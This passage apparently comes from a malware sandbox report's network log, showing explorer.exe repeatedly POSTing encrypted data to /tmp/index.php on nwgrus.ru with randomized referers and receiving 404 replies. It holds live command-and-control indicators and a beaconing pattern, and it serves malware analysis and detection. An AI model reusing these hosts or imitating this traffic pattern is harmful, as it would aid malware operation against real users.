74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49760	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:51.427004099 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qqewfcdsrwqbg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 174 Host: nwgrus.ru
Oct 3, 2024 02:52:51.427081108 CEST	174	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 34 43 f0 87 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu4C)njpmDd+0Nu)r="4Z#0;"JQkN,Qw=:l(hz
Oct 3, 2024 02:52:52.738327026 CEST	189	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49763	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:53.970432997 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pdbldukfsrlj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 135 Host: nwgrus.ru
Oct 3, 2024 02:52:53.970432997 CEST	135	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1d 6b 2c 90 f4 76 0b 75 4a 1a cc 81 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA ,[k,vuJPBaOYI.ghM`BsiyXO
Oct 3, 2024 02:52:55.080913067 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:54 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49764	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:55.103493929 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rgaydglbcbbvar.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 128 Host: nwgrus.ru
Oct 3, 2024 02:52:55.103493929 CEST	128	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 3b 31 b4 ea Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu;1VzTv't_)~w)puAk
Oct 3, 2024 02:52:56.192848921 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49765	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:56.206717014 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ticrvurjrjsf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 340 Host: nwgrus.ru
Oct 3, 2024 02:52:56.206743002 CEST	340	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 2e 37 d6 9d Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu.7}[wu)y/Qe/tv@tW=Y@L.M+6P/N16@0(BqFVIdiP>/W'5gjsRa
Oct 3, 2024 02:52:57.296926975 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49766	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:57.304415941 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://drnoexjyrauki.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 159 Host: nwgrus.ru
Oct 3, 2024 02:52:57.304440975 CEST	159	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 7e 38 e5 f0 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu~8u r=!_\yn4_gK{ 8Q/%2/H;B3
Oct 3, 2024 02:52:58.422266006 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:58 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49767	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:58.452884912 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wbbiwyhshhf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 298 Host: nwgrus.ru
Oct 3, 2024 02:52:58.452886105 CEST	298	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 67 4f ad aa Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vugOL6\kj}]cO27fUHz6kUCJ]P'N-dC,AU}4UF.'`K{')kxJU&
Oct 3, 2024 02:52:59.537938118 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49786	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:54:07.901981115 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wvjpwlsevsc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 151 Host: nwgrus.ru
Oct 3, 2024 02:54:07.902046919 CEST	151	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 64 33 ae 8a Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vud3dyC{"{'WJ?j QGcVZIw(^Q
Oct 3, 2024 02:54:09.019166946 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:54:08 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49787	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:54:14.677408934 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vssaauwgvmedfq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 253 Host: nwgrus.ru
Oct 3, 2024 02:54:14.677423954 CEST	253	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 32 1d cf a9 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vu2vN>SN0f$VsAQ,EBDcPQ%Wpcy>7&e,+ikC?)\+!kL[ee8k.?
Oct 3, 2024 02:54:15.772309065 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:54:15 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49788	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:54:23.080152035 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pubortabbcvvvfcg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 342 Host: nwgrus.ru
Oct 3, 2024 02:54:23.080184937 CEST	342	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3c 1f ce ee Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vu<OxU[a6Q&2v(jU;C$54+!@P?(C':W@;"-b'+2J.F~erpLrDi7V7b
Oct 3, 2024 02:54:24.173683882 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:54:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49789	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:54:30.642303944 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vfyrxdwalbtb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 151 Host: nwgrus.ru
Oct 3, 2024 02:54:30.642373085 CEST	151	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 02 d4 80 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vuJ5S^xN]J0T/nGG?1O^ 2g5MP^L(
Oct 3, 2024 02:54:31.822818995 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:54:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49790	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:54:40.346215963 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nyhrbrqisswma.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 220 Host: nwgrus.ru
Oct 3, 2024 02:54:40.346232891 CEST	220	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 78 54 de a7 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vuxTQcj<iaT,wL$f<QP9 +>PB\?y) PTX'"Z-^n
Oct 3, 2024 02:54:41.494410038 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:54:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49792	201.212.52.197	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:54:55.349387884 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mtigasxvtneuwtdj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 284 Host: nwgrus.ru
Oct 3, 2024 02:54:55.349399090 CEST	284	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3f 30 dc f3 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vu?0Oay;K?V-ncPyj8\|.^rn-'7d"g)},VV\$0\|a9c@QBEsfsGiqg;"I)
Oct 3, 2024 02:54:56.653625011 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:54:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49794	201.212.52.197	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:55:12.858268023 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://frgbxqyrenbq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 354 Host: nwgrus.ru
Oct 3, 2024 02:55:12.858299971 CEST	354	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7a 3c b7 9c Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vuz<p^logmOKU#x6beFV4>1GOTABQfht9nCy1qf^W> <gh=^l\#33
Oct 3, 2024 02:55:14.179193020 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:55:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49796	201.212.52.197	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:55:30.057107925 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ahaddcjrcpv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 166 Host: nwgrus.ru
